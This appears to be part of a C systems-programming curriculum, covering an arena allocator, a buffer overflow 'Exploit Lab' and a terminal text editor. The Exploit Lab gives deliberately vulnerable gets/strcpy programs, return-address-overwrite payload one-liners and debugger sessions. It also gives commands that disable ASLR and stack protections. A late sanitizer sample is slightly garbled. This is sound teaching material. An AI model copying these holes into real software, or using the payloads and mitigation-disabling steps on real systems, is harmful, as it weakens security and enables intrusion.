
Simulating game frames...

Frame 1 - Arena used: 66096 bytes
  Reset complete - ready for next frame

Frame 2 - Arena used: 66096 bytes
  Reset complete - ready for next frame

Frame 3 - Arena used: 66096 bytes
  Reset complete - ready for next frame

Frame 4 - Arena used: 66096 bytes
  Reset complete - ready for next frame

Frame 5 - Arena used: 66096 bytes
  Reset complete - ready for next frame

Game simulation complete!

Step-by-Step: What You See

  1. Arena Creation:
    • Request large memory block from OS via mmap()
    • Initialize with base pointer, offset=0, capacity
    • One syscall up front; after that, arena allocations never enter the kernel
  2. Allocation Pattern:
    • Watch the offset (bump pointer) advance with each allocation
    • No searching for free blocks - just increment!
    • O(1) allocation every time
  3. The O(1) Reset Magic:
    • arena_reset() just sets offset back to 0
    • All allocations “disappear” instantly
    • Memory is reused without any syscalls
  4. Performance Benefits:
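    • Expect a large speedup for batch allocation patterns (about 35x in the benchmark above; the exact factor depends on your machine and malloc implementation)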
    • Perfect for frame-based workloads (games, request handlers)
    • Zero fragmentation within arena lifetime
  5. Visual Understanding:
    • Base pointer never changes
    • Current pointer = base + offset
    • Reset moves current back to base
    • Like rewinding a tape - instant and free!

Learning milestones:

  1. First milestone: You understand that malloc is just software managing a byte array
  2. Second milestone: You can explain the tradeoff between flexibility and performance in allocators
  3. Final milestone: You see memory as a resource to be managed, not a magic service

The Core Question You’re Answering

“What if I could allocate memory with just a pointer increment, and free everything at once?”

This is the arena allocator’s insight. It trades flexibility (individual frees) for speed (O(1) allocation, O(1) bulk free). By building one, you understand that malloc is just one way to manage memory—and often not the best way.


Concepts You Must Understand First

Stop and research these before coding:

  1. Why Allocators Exist
    • Why can’t you just ask the OS for memory every time you need it?
    • What’s the overhead of a syscall vs a function call?
    • Why does malloc batch requests to the OS?
    • Book Reference: “Operating Systems: Three Easy Pieces” Ch. 17 - Arpaci-Dusseau
  2. The Bump Allocator (Simplest Possible)
    • What is a bump pointer?
    • Why is bump allocation O(1)?
    • What’s the downside? (You can’t free individual allocations)
    • When is this acceptable? (Short-lived, batch allocations)
  3. Memory Alignment
    • Why must some data types start at specific addresses?
    • What happens if you store an int at an odd address? (Crash on some CPUs!)
    • How do you “round up” a pointer to the next aligned address?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.9.3 - Bryant & O’Hallaron
  4. Getting Memory from the OS
    • What is mmap and when do you use it?
    • What’s the difference between mmap and sbrk?
    • Why might you prefer mmap for an arena?
    • Book Reference: “The Linux Programming Interface” Ch. 49 - Michael Kerrisk

Questions to Guide Your Design

Before implementing, think through these:

  1. Arena Structure
    • What fields does your Arena struct need?
    • At minimum: base pointer, current offset, and capacity
    • Should you store alignment? Should you allow multiple blocks?
  2. Allocation
    • How do you “bump” the pointer?
    • What if the requested size exceeds remaining space?
    • How do you handle alignment for different types?
  3. Reset vs Destroy
    • What does arena_reset do? (Set offset back to 0)
    • What does arena_destroy do? (Free the underlying memory)
    • Why is reset useful? (Reuse the same arena for the next batch)
  4. When to Use Arenas
    • Game frames: allocate during frame, reset at frame end
    • Request handling: allocate during request, reset when done
    • Parsing: allocate AST nodes, free everything when parse is complete
    • What do these patterns have in common?
  5. Growing Arenas (Advanced)
    • What if you run out of space?
    • Option 1: Return NULL (fail)
    • Option 2: Allocate a new block, chain them together
    • What’s the tradeoff?

Thinking Exercise: Design the Data Structure

Before coding, design your arena on paper:

Arena (1024 bytes total)

[ base             ]----+
[ offset = 0       ]    |
[ capacity = 1024  ]    |
                        v
+----------------------------------------------------+
| empty space (1024 bytes)                           |
+----------------------------------------------------+
^
current position (base + offset)

After arena_alloc(arena, 100):

[ base             ]----+
[ offset = 100     ]    |
[ capacity = 1024  ]    |
                        v
+----------------------------------------------------+
| USED: 100 bytes  |  empty space (924 bytes)        |
+----------------------------------------------------+
                   ^
                   current position (base + 100)

After arena_alloc(arena, 200):

[ offset = 300     ]
+----------------------------------------------------+
| USED: 100 |  USED: 200   |  empty (724 bytes)      |
+----------------------------------------------------+
                           ^
                           current position

Arena Allocator States

Questions:

  • What if the next allocation requests 800 bytes?
  • How would you align the second allocation to 8 bytes?
  • What happens to that 724 bytes after arena_reset()?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is an arena allocator? When would you use one?”
  2. “What’s the time complexity of arena allocation vs malloc?”
  3. “Why can’t you free individual allocations from an arena?”
  4. “What is memory alignment and why does it matter?”
  5. “Compare arena allocators to pool allocators to general-purpose allocators.”
  6. “In what scenarios would an arena allocator be faster than malloc?”

Hints in Layers (Only If Stuck)

Hint 1: The Minimal Arena Struct

```c
typedef struct {
    char*  base;      // Start of memory block
    size_t offset;    // Current position (bytes used)
    size_t capacity;  // Total size of block
} Arena;
```

That's it! Three fields.

Hint 2: Basic arena_alloc

```c
void* arena_alloc(Arena* arena, size_t size) {
    // Compare against the remaining space: "offset + size" could wrap around for huge sizes
    if (size > arena->capacity - arena->offset) {
        return NULL;  // Out of space
    }
    void* ptr = arena->base + arena->offset;
    arena->offset += size;
    return ptr;
}
```

This is the "bump." It's O(1)!

Hint 3: Alignment

To align to N bytes, round up the offset:

```c
// Works only when alignment is a power of two (1, 2, 4, 8, 16, ...)
size_t align_up(size_t offset, size_t alignment) {
    return (offset + alignment - 1) & ~(alignment - 1);
}

void* arena_alloc_aligned(Arena* arena, size_t size, size_t alignment) {
    size_t aligned_offset = align_up(arena->offset, alignment);
    if (aligned_offset > arena->capacity ||
        size > arena->capacity - aligned_offset) {
        return NULL;
    }
    void* ptr = arena->base + aligned_offset;
    arena->offset = aligned_offset + size;
    return ptr;
}
```

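Hint 4: Use mmap for the Block

```c
#include <stdlib.h>
#include <sys/mman.h>

Arena* arena_create(size_t size) {
    Arena* arena = malloc(sizeof(Arena));
    if (arena == NULL) return NULL;

    arena->base = mmap(NULL, size, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (arena->base == MAP_FAILED) {  // mmap reports failure with MAP_FAILED, not NULL
        free(arena);
        return NULL;
    }
    arena->offset = 0;
    arena->capacity = size;
    return arena;
}

void arena_destroy(Arena* arena) {
    if (arena == NULL) return;
    munmap(arena->base, arena->capacity);
    free(arena);
}
```

`mmap` gives you a large, zero-initialized block directly from the OS.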

Books That Will Help

| Topic | Book | Chapter |
|-------|------|---------|
| Arena design patterns | “C Interfaces and Implementations” | Ch. 5-6 |
| Memory allocator internals | “Computer Systems: A Programmer’s Perspective” | Ch. 9.9 |
| mmap and virtual memory | “The Linux Programming Interface” | Ch. 49 |
| Alignment requirements | “Computer Systems: A Programmer’s Perspective” | Ch. 3.9.3 |
| Allocator strategies | “Operating Systems: Three Easy Pieces” | Ch. 17 |

Project 5: Exploit Lab (Buffer Overflow Playground)

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Programming Language: C
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Security / Systems Internals
  • Software or Tool: GDB / Buffer Overflows
  • Main Book: “Hacking: The Art of Exploitation” by Jon Erickson

What you’ll build: A set of intentionally vulnerable programs and exploits that demonstrate buffer overflow, return address overwriting, and memory corruption—in a controlled environment.

Why it teaches memory & control: Nothing makes memory real like watching your input overwrite a return address and redirect execution. This is where “undefined behavior” stops being a compiler warning and becomes observable reality.

Core challenges you’ll face:

  • Overflowing a buffer to overwrite adjacent variables (maps to: buffer overflow)
  • Overwriting a function’s return address on the stack (maps to: stack layout)
  • Understanding why ASLR/stack canaries exist (maps to: why C doesn’t protect you)
  • Using lldb to observe the corruption in real-time (maps to: debuggers see memory)
  • Crafting input that survives null-byte restrictions (maps to: string representation)

Key Concepts:

| Concept | Resource |
|---------|----------|
| Stack smashing | “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson |
| Return-oriented programming basics | LiveOverflow YouTube - “Binary Exploitation” series |
| Using sanitizers | LLVM AddressSanitizer documentation |

Difficulty: Intermediate-Advanced
Time estimate: 1-2 weeks
Prerequisites: Solid understanding of stack frames, comfort with lldb

Real World Outcome

When you complete this project, you’ll have concrete proof that buffer overflows aren’t just theoretical. Here’s what success looks like:

1. Basic Variable Overwrite (Level 1)

Running the exploit:

$ ./level1_vuln $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")
You win!

What happened: The buffer overflow overwrote the adjacent check variable with the magic value 0x12345678.

Before the overflow (in lldb):

(lldb) frame variable
(char [64]) buffer = ""
(int) check = 0

After the overflow (in lldb):

(lldb) frame variable
(char [64]) buffer = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
(int) check = 305419896 (0x12345678)  // ← Overwritten!

2. Return Address Overwrite (Level 2)

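Exploiting the program (only the three non-zero bytes of the address are sent; a command-line argument cannot contain NUL bytes and strcpy stops at the first one, so its terminating NUL supplies the fourth byte and the upper bytes of the saved return address must already be zero):

$ ./level2_vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40')")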
You shouldn't be able to call this function!
Segmentation fault: 11

Visual: Stack Corruption Step-by-Step

Before strcpy:

High addresses
┌────────────────────────────┐
│  Return Address            │  ← points back into main() (legitimate)
├────────────────────────────┤
│  Saved Frame Pointer       │  ← 0x00007fff5fbff8b0
├────────────────────────────┤
│  buffer[64]                │  ← Empty
│  (64 bytes)                │
└────────────────────────────┘
Low addresses

After strcpy with 72 ‘A’s + address:

High addresses
┌────────────────────────────┐
│  Return Address            │  ← 0x0000000000401156 (win function!)
├────────────────────────────┤
│  Saved Frame Pointer       │  ← 0x4141414141414141 ('AAAAAAAA')
├────────────────────────────┤
│  buffer[64]                │  ← 'AAAA...AAAA' (64 A's)
│  (64 bytes)                │
└────────────────────────────┘
Low addresses

3. Full lldb Session Showing Exploitation

Setting up the debugger:

$ lldb ./level2_vuln
(lldb) breakpoint set --name vulnerable
Breakpoint 1: where = level2_vuln`vulnerable, address = 0x0000000100003f20
(lldb) run $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40')")

Before the vulnerability:

Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
    frame #0: 0x0000000100003f20 level2_vuln`vulnerable
level2_vuln`vulnerable:
->  0x100003f20 <+0>: push   rbp
    0x100003f21 <+1>: mov    rbp, rsp
    0x100003f24 <+4>: sub    rsp, 0x50

(lldb) register read rbp rsp rip
     rbp = 0x00007fff5fbff8b0
     rsp = 0x00007fff5fbff8b8
     rip = 0x0000000100003f20  level2_vuln`vulnerable

After strcpy executes (use next to step past the strcpy line first):

(lldb) next
(lldb) memory read --size 8 --format x --count 10 $rbp-64

0x7fff5fbff870: 0x4141414141414141  ← buffer starts here
0x7fff5fbff878: 0x4141414141414141
0x7fff5fbff880: 0x4141414141414141
0x7fff5fbff888: 0x4141414141414141
0x7fff5fbff890: 0x4141414141414141
0x7fff5fbff898: 0x4141414141414141
0x7fff5fbff8a0: 0x4141414141414141
0x7fff5fbff8a8: 0x4141414141414141
0x7fff5fbff8b0: 0x4141414141414141  ← saved rbp (corrupted!)
0x7fff5fbff8b8: 0x0000000000401156  ← return address (OVERWRITTEN to win!)

Register dump showing corruption:

(lldb) register read
General Purpose Registers:
       rax = 0x00007fff5fbff870
       rbx = 0x0000000000000000
       rcx = 0x00007fff5fbff870
       rdx = 0x00007fff5fbff9c0
       rdi = 0x00007fff5fbff870  ← points to our 'AAAA...' string
       rsi = 0x00007fff5fbff9c0
       rbp = 0x4141414141414141  ← CORRUPTED! Was a valid address
       rsp = 0x00007fff5fbff8b8  ← points at the overwritten return address
       rip = 0x0000000100003f45  ← still in vulnerable(), about to return

When the function returns:

(lldb) nexti
(lldb) register read rip
       rip = 0x0000000000401156  ← Now executing win()!

Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x0000000000401156 level2_vuln`win
level2_vuln`win:
->  0x401156 <+0>: push   rbp
    0x401157 <+1>: mov    rbp, rsp
    0x40115a <+4>: lea    rdi, [rip + 0xe9b]
    0x401161 <+11>: call   puts

Terminal output:

You shouldn't be able to call this function!
You've successfully exploited the buffer overflow!

4. Detection with AddressSanitizer

When you compile the same program with -fsanitize=address, here’s what you see:

$ clang -fsanitize=address -g level2_vuln.c -o level2_vuln_asan
$ ./level2_vuln_asan $(python3 -c "print('A'*72 + 'BBBBBBBB')")

=================================================================
==23456==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee3bff8b0 at pc 0x000104a3c890 bp 0x7ffee3bff850 sp 0x7ffee3bff010
WRITE of size 80 at 0x7ffee3bff870 thread T0
    #0 0x104a3c88f in __asan_memcpy
    #1 0x104a02156 in vulnerable level2_vuln.c:12
    #2 0x104a02089 in main level2_vuln.c:23
    #3 0x7fff6c3a9cc8 in start

Address 0x7ffee3bff8b0 is located in stack of thread T0 at offset 112 in frame
    #0 0x104a020cf in vulnerable level2_vuln.c:10

  This frame has 1 object(s):
    [32, 96) 'buffer' (line 11) ← 64-byte buffer
HINT: this may be a false positive if your program uses some custom stack unwind mechanism
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow in __asan_memcpy
Shadow bytes around the buggy address:
=>0x1fffdc77fef0: 00 00 00 00 00 00[f1]f1 f1 f1 00 00 00 00 00 00
  0x1fffdc77ff00: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
==23456==ABORTING

What this shows: AddressSanitizer caught the overflow immediately, showing:

  • Exactly where the write occurred (vulnerable level2_vuln.c:12)
  • How much was written (80 bytes into a 64-byte buffer)
  • The stack frame layout and what got corrupted

5. Deliverables

By the end of this project, you’ll have:

  1. A set of increasingly difficult vulnerable programs:
    • level1.c - Variable overwrite
    • level2.c - Return address overwrite
    • level3.c - Calling a “win” function
    • level4.c - (Advanced) Basic shellcode injection
  2. Exploit scripts for each level:
    • Shows exact byte offsets
    • Demonstrates little-endian encoding
    • Includes comments explaining each step
  3. A detailed write-up (markdown) containing:
    • Stack diagrams for each vulnerability
    • lldb commands used to verify exploitation
    • Before/after register and memory dumps
    • Explanation of what would happen with ASLR/canaries enabled
    • Discussion of modern mitigations (DEP, ASLR, stack canaries)
  4. Visual proof:
    • Screenshots or terminal recordings of successful exploits
    • lldb session logs showing return address modification
    • AddressSanitizer output catching the vulnerabilities

Why This Matters

After completing this project, the phrase “buffer overflow” transforms from an abstract concept to a visceral understanding. You’ve seen:

  • Memory corruption happening in real-time
  • How a simple string copy can hijack program control flow
  • Why security mitigations like ASLR exist
  • That “undefined behavior” has very defined consequences

This knowledge is the foundation for understanding:

  • Why modern languages emphasize memory safety
  • How attackers think about software vulnerabilities
  • What security researchers mean by “exploitable”
  • Why code review and secure coding practices matter

Learning milestones:

  1. First milestone: You can overflow a buffer to change an adjacent variable’s value
  2. Second milestone: You can overwrite a return address to redirect execution
  3. Final milestone: You viscerally understand why memory safety matters

The Core Question You’re Answering

“Why do buffer overflows let attackers take over computers?”

This question has defined computer security for 50 years. By building and exploiting vulnerable programs yourself, you’ll understand exactly how memory corruption becomes code execution—and why this is such a serious problem.


Concepts You Must Understand First

Stop and research these before coding:

  1. Stack Frame Layout (Critical!)
    • What’s in a stack frame? (Local variables, saved frame pointer, return address)
    • In what order are these laid out?
    • Which direction does the stack grow? Which direction do arrays grow?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron
  2. The Return Address
    • What is the return address and where is it stored?
    • What happens at the call instruction? At ret?
    • What if you change the return address to point somewhere else?
    • Book Reference: “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson
  3. Buffer Overflow Mechanics
    • What happens when you write past the end of a buffer?
    • Why does C allow this? (No bounds checking)
    • What values can you overwrite?
  4. Modern Mitigations
    • ASLR: Randomizes addresses on each run—why does this help?
    • Stack Canaries: Magic values that detect overwrites—how do they work?
    • NX/DEP: Non-executable stack—why is this effective?
    • How do you disable these for learning? (-fno-stack-protector, -z execstack, -no-pie)

Questions to Guide Your Design

Before implementing, think through these:

  1. Level 1: Variable Overwrite
    • Create a program with a buffer and an adjacent “secret” variable
    • How do you overflow the buffer to change the secret?
    • What’s the exact offset you need to write to?
  2. Level 2: Control Flow Hijack
    • Create a program with a vulnerable function
    • Where is the return address relative to the buffer?
    • How do you calculate the exact bytes to overwrite?
    • What address do you redirect execution to?
  3. Level 3: Calling a “Win” Function
    • Create a program with a function that’s never called (void win() { ... })
    • How do you find the address of win()?
    • Craft input that makes the program call win() when it shouldn’t
  4. Level 4: Shellcode (Advanced)
    • What is shellcode?
    • Why do you need the stack to be executable?
    • How do you jump to your own code?
    • What’s a NOP sled and why is it useful?

Thinking Exercise: Map the Stack

Draw the stack for this function:

void vulnerable() {
    char buffer[64];
    int authenticated = 0;

    printf("Enter password: ");
    gets(buffer);  // VULNERABLE!

    if (authenticated) {
        printf("Access granted!\n");
    } else {
        printf("Access denied.\n");
    }
}

Draw the stack frame:

High addresses
+------------------------+
|    return address      |  <-- target for level 2
+------------------------+
|    saved frame pointer |
+------------------------+
|    authenticated (4)   |  <-- target for level 1
+------------------------+
|                        |
|    buffer[64]          |
|                        |
+------------------------+
Low addresses

Vulnerable Stack Frame

Questions:

  • If buffer starts at offset 0, where is authenticated?
  • What input would change authenticated to non-zero?
  • Where is the return address relative to buffer?
  • What input would overwrite the return address?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is a buffer overflow? How does it lead to code execution?”
  2. “Walk me through how a stack-based buffer overflow works.”
  3. “What is ASLR? How does it protect against exploits?”
  4. “What are stack canaries? How do they work?”
  5. “What’s the difference between a stack overflow and a buffer overflow?”
  6. “Why is gets() so dangerous? What should you use instead?”

Hints in Layers (Only If Stuck)

Hint 1: Disable Protections for Learning

Compile with protections disabled:

```bash
# Disable stack canary
gcc -fno-stack-protector vulnerable.c -o vulnerable

# Also disable ASLR for consistent addresses
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# For shellcode, make stack executable
gcc -fno-stack-protector -z execstack vulnerable.c -o vulnerable
```

**Note**: On macOS, use `lldb` and `-fno-stack-protector`. ASLR is harder to disable.

Hint 2: Find the Offset

Create a pattern to find the exact offset:

```bash
# Fill with recognizable pattern: 64 bytes of buffer, 8 bytes of saved rbp, then the return address
python3 -c "print('A'*64 + 'B'*8 + 'CCCC')" | ./vulnerable

# In lldb, examine where you crashed
(lldb) register read rip
# If RIP contains 0x43434343 ('CCCC'), offset is 72 bytes (x86-64, non-PIE binary)
```

Or use a cyclic pattern generator like `pattern_create` from Metasploit.

Hint 3: Simple Variable Overwrite

```c
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {
    int check = 0;
    char buffer[64];

    if (argc < 2) return 1;     // need the payload as argv[1]
    strcpy(buffer, argv[1]);    // VULNERABLE

    if (check == 0x12345678) {
        printf("You win!\n");
    } else {
        printf("check = 0x%08x\n", check);
    }
    return 0;
}
```

Run with: `./vuln $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")`

Note the little-endian byte order!

Hint 4: Finding the Win Function Address

```bash
# Find address of win() function
objdump -d ./vulnerable | grep win
# or
nm ./vulnerable | grep win
# Output like: 0000000000401156 T win

# Use this address (in little-endian) as your overwrite target
```

Craft input:

```bash
python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')" | ./vulnerable
```

Hint 5: Use lldb to Watch the Corruption

```bash
lldb ./vulnerable
(lldb) breakpoint set --name vulnerable
(lldb) run AAAABBBBCCCCDDDD...

# At the breakpoint
(lldb) frame variable              # See local variables
(lldb) memory read -fx -c32 $rbp-80   # View stack
(lldb) register read               # See all registers
(lldb) continue

# After the crash
(lldb) register read rip           # Where did it try to go?
(lldb) bt                          # Backtrace
```

---

### Safety and Ethics Note

This project involves exploitation techniques. Use them ONLY:

- On programs you write yourself
- On systems you own or have explicit permission to test
- For educational purposes

Never attempt to exploit software you don't own or systems you don't control. This is illegal and unethical.

---

### Books That Will Help

| Topic | Book | Chapter |
|-------|------|---------|
| Buffer overflow fundamentals | "Hacking: The Art of Exploitation" | Ch. 3 |
| Stack layout and assembly | "Computer Systems: A Programmer's Perspective" | Ch. 3.7-3.10 |
| Exploit development | "The Shellcoder's Handbook" | Ch. 1-5 |
| Memory corruption attacks | "Practical Binary Analysis" | Ch. 10 |
| Modern mitigations | "Secure Coding in C and C++" | Ch. 2-3 |

---

## Project Comparison Table

| Project | Difficulty | Time | Depth of Understanding | Fun Factor |
|---------|------------|------|------------------------|------------|
| Memory Inspector | Beginner | Weekend | ⭐⭐⭐ | ⭐⭐⭐ |
| Safe String Library | Beginner-Intermediate | Weekend | ⭐⭐⭐⭐ | ⭐⭐⭐ |
| Memory Leak Detector | Intermediate | 1-2 weeks | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐ |
| Arena Allocator | Intermediate | 1 week | ⭐⭐⭐⭐ | ⭐⭐⭐⭐ |
| Exploit Lab | Intermediate-Advanced | 1-2 weeks | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ |

---

## Recommended Learning Path

Based on your curriculum, I recommend this sequence:

1. **Start with Memory Inspector** (Weekend 1)
   - Gets you seeing memory immediately
   - Low friction, high insight
   - Foundation for everything else
2. **Then Safe String Library** (Weekend 2)
   - First taste of "how C fails to protect you"
   - Pointer arithmetic becomes intuitive
3. **Then Arena Allocator** (Week 2)
   - Demystifies what allocators actually do
   - Quick win that builds confidence
4. **Then Memory Leak Detector** (Week 2-3)
   - Deepest understanding of lifetime and ownership
   - Most directly maps to real debugging skills
5. **Finish with Exploit Lab** (Week 3+)
   - Victory lap: everything clicks
   - Makes abstract dangers concrete

---

## Final Comprehensive Project: Mini Text Editor

- **File**: SPRINT_1_REAL_WORLD_PROJECTS.md
- **Programming Language**: C
- **Coolness Level**: Level 5: Pure Magic (Super Cool)
- **Business Potential**: 1. The "Resume Gold"
- **Difficulty**: Level 3: Advanced
- **Knowledge Area**: Systems Programming / Memory Management
- **Software or Tool**: Terminal / ncurses alternative
- **Main Book**: "The C Programming Language" by Kernighan & Ritchie

**What you'll build**: A terminal-based text editor (think nano/micro) from scratch in C, with undo/redo, search, and file I/O.

**Why it teaches everything**: A text editor is the ultimate memory management crucible. You need:

- Dynamic buffer management (growing arrays of lines)
- String manipulation everywhere (every keystroke modifies strings)
- Careful lifetime management (undo history holds old versions)
- No leaks (users run editors for hours)
- Performance (responsive to every keypress)

**Core challenges you'll face**:

- Gap buffer or rope data structure for efficient insertion (maps to: *memory layout, allocator design*)
- Managing undo/redo stack without leaking (maps to: *object lifetime, when to free*)
- Terminal raw mode and escape sequences (maps to: *bytes and interpretation*)
- Growing buffers dynamically (maps to: *realloc, fragmentation*)
- Finding and fixing your inevitable memory bugs (maps to: *debuggers, sanitizers*)

**Resources for key challenges**:

- [Kilo Text Editor Tutorial](https://viewsourcecode.org/snaptoken/kilo/) - Antirez's tutorial for building a minimal editor
- [Build Your Own Text Editor](https://github.com/codecrafters-io/build-your-own-x#build-your-own-text-editor) - Curated resources

**Key Concepts**:

| Concept | Resource |
|---------|----------|
| Gap buffer data structure | "Data Structures and Algorithms" - relevant chapters |
| Terminal raw mode | [Kilo tutorial](https://viewsourcecode.org/snaptoken/kilo/) - Step by step |
| Undo/redo implementation | "Programming in the Real World" - any chapter on editing models |

**Difficulty**: Advanced
**Time estimate**: 2-4 weeks
**Prerequisites**: All previous projects

## Real World Outcome

When you complete this project, you'll have built a fully functional text editor from scratch. Here's what success looks like:

### 1. The Editor Interface

**What the terminal looks like when running:**

```
┌────────────────────────────────────────────────────────────────────────────────┐
│ mini.c - Modified                                                   Line 15/42 │
├────────────────────────────────────────────────────────────────────────────────┤
│  1  #include                                                                   │
│  2  #include                                                                   │
│  3  #include                                                                   │
│  4  #include                                                                   │
│  5                                                                             │
│  6  struct EditorState {                                                       │
│  7      char** lines;                                                          │
│  8      int num_lines;                                                         │
│  9      int cursor_x;                                                          │
│ 10      int cursor_y;                                                          │
│ 11      int modified;                                                          │
│ 12  };                                                                         │
│ 13                                                                             │
│ 14  void editor_insert_char(EditorState* state, char c) {                      │
│ 15      // Insert character at cursor position█                                │
│ 16      char* line = state->lines[state->cursor_y];                            │
│ 17      // Expand line buffer if needed                                        │
│ 18      ...                                                                    │
│ 19  }                                                                          │
│ 20                                                                             │
│ ~                                                                              │
│ ~                                                                              │
│ ~                                                                              │
├────────────────────────────────────────────────────────────────────────────────┤
│ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo | Ctrl-F: Find       │
└────────────────────────────────────────────────────────────────────────────────┘
```

**Key visual elements:**

- **Header bar**: Shows filename, modification status, and current line/total lines
- **Line numbers**: Left gutter showing line numbers (optional but professional)
- **Active cursor**: Visible blinking cursor (`█`) at current position
- **Status bar**: Bottom bar showing available keyboard shortcuts
- **Tilde markers**: `~` indicates lines beyond end of file (like vim/nano)

### 2. Step-by-Step Walkthrough: Using the Editor

**Opening a file:**

```bash
$ ./mini_editor hello.txt
# If file doesn't exist, editor starts with empty buffer
# If file exists, content is loaded into memory
```

**Initial empty state:**

```
┌────────────────────────────────────────────────────────────────────────────────┐
│ hello.txt - New File                                                  Line 1/1 │
├────────────────────────────────────────────────────────────────────────────────┤
│  1  █                                                                          │
│ ~                                                                              │
│ ~                                                                              │
│ ~                                                                              │
├────────────────────────────────────────────────────────────────────────────────┤
│ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo                      │
└────────────────────────────────────────────────────────────────────────────────┘
```

**Typing text:**

```
User types: "Hello, World!"

┌────────────────────────────────────────────────────────────────────────────────┐
│ hello.txt - Modified                                                  Line 1/1 │
├────────────────────────────────────────────────────────────────────────────────┤
│  1  Hello, World!█                                                             │
│ ~                                                                              │
│ ~                                                                              │
│ ~                                                                              │
├────────────────────────────────────────────────────────────────────────────────┤
│ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo                      │
└────────────────────────────────────────────────────────────────────────────────┘

# Notice:
# - "Modified" indicator appears in header
# - Cursor moves as you type
# - Text appears immediately (no lag)
```

**Pressing Enter to create new lines:**

```
User types: [Hello, World!] → [Enter] → [This is line 2]

┌────────────────────────────────────────────────────────────────────────────────┐
│ hello.txt - Modified                                                  Line 2/2 │
├────────────────────────────────────────────────────────────────────────────────┤
│  1  Hello, World!                                                              │
│  2  This is line 2█                                                            │
│ ~                                                                              │
│ ~                                                                              │
├────────────────────────────────────────────────────────────────────────────────┤
│ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo                      │
└────────────────────────────────────────────────────────────────────────────────┘

# Notice:
# - Line count updated (2/2)
# - Cursor on line 2
# - Gap buffer efficiently handles insertion
```

**Using Undo (Ctrl-Z):**

```
User presses: Ctrl-Z

┌────────────────────────────────────────────────────────────────────────────────┐
│ hello.txt - Modified                                                  Line 1/1 │
├────────────────────────────────────────────────────────────────────────────────┤
│  1  Hello, World!█                                                             │
│ ~                                                                              │
│ ~                                                                              │
│ ~                                                                              │
├────────────────────────────────────────────────────────────────────────────────┤
│ Undid: Insert line                                                             │
└────────────────────────────────────────────────────────────────────────────────┘

# The second line disappeared!
# Undo stack popped the last action
# Redo stack now contains the undone action
```

**Using Redo (Ctrl-Y):**

```
User presses: Ctrl-Y

┌────────────────────────────────────────────────────────────────────────────────┐
│ hello.txt - Modified                                                  Line 2/2 │
├────────────────────────────────────────────────────────────────────────────────┤
│  1  Hello, World!                                                              │
│  2  This is line 2█                                                            │
│ ~                                                                              │
│ ~                                                                              │
├────────────────────────────────────────────────────────────────────────────────┤
│ Redid: Insert line                                                             │
└────────────────────────────────────────────────────────────────────────────────┘

# Line 2 is back!
# Redo stack was popped, undo stack was pushed
```

**Saving the file (Ctrl-S):**

```
User presses: Ctrl-S

┌────────────────────────────────────────────────────────────────────────────────┐
│ hello.txt                                                             Line 2/2 │
├────────────────────────────────────────────────────────────────────────────────┤
│  1  Hello, World!
│ │ 2 This is line 2█ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Saved 2 lines to hello.txt │ └────────────────────────────────────────────────────────────────────────────────┘ # Notice: # - "Modified" indicator removed from header # - Status bar shows confirmation # - File written to disk ``` ### 3. Memory Safety Verification with AddressSanitizer **Compiling with AddressSanitizer:** ```bash $ clang -fsanitize=address -g -O1 mini_editor.c -o mini_editor ``` **Running a stress test session:** ```bash $ ./mini_editor test.txt # Perform these operations: # 1. Type 1000 characters # 2. Create 50 new lines # 3. Delete 25 lines # 4. Undo 30 times # 5. Redo 30 times # 6. Search for text 10 times # 7. Save file # 8. Quit (Ctrl-Q) ``` **AddressSanitizer output on clean exit:** ``` ================================================================= ==12345==AddressSanitizer: exiting ASAN:DEADLYSIGNAL ================================================================= ==12345==LeakSanitizer: detected memory leaks # ... detailed leak report would appear here if there were leaks ... Direct leak of 0 bytes in 0 objects allocated from: #0 0x... in malloc Indirect leak of 0 bytes in 0 objects allocated from: #0 0x... in malloc SUMMARY: AddressSanitizer: 0 byte(s) leaked in 0 allocation(s). ``` **Perfect output (no errors, no leaks):** ```bash $ ./mini_editor test.txt # ... use the editor normally ... # ... perform many edits, undo/redo operations ... # ... save and quit ... $ echo $? 
0
# No output from AddressSanitizer means nothing was detected on the paths you exercised:
# ✓ No buffer overflows
# ✓ No use-after-free
# ✓ No double-free
# ✓ No memory leaks
# ✓ Clean exit with all memory freed
```

**What AddressSanitizer catches if you have bugs:**

```bash
# Example 1: Memory leak in undo stack
=================================================================
==45678==ERROR: LeakSanitizer: detected memory leaks

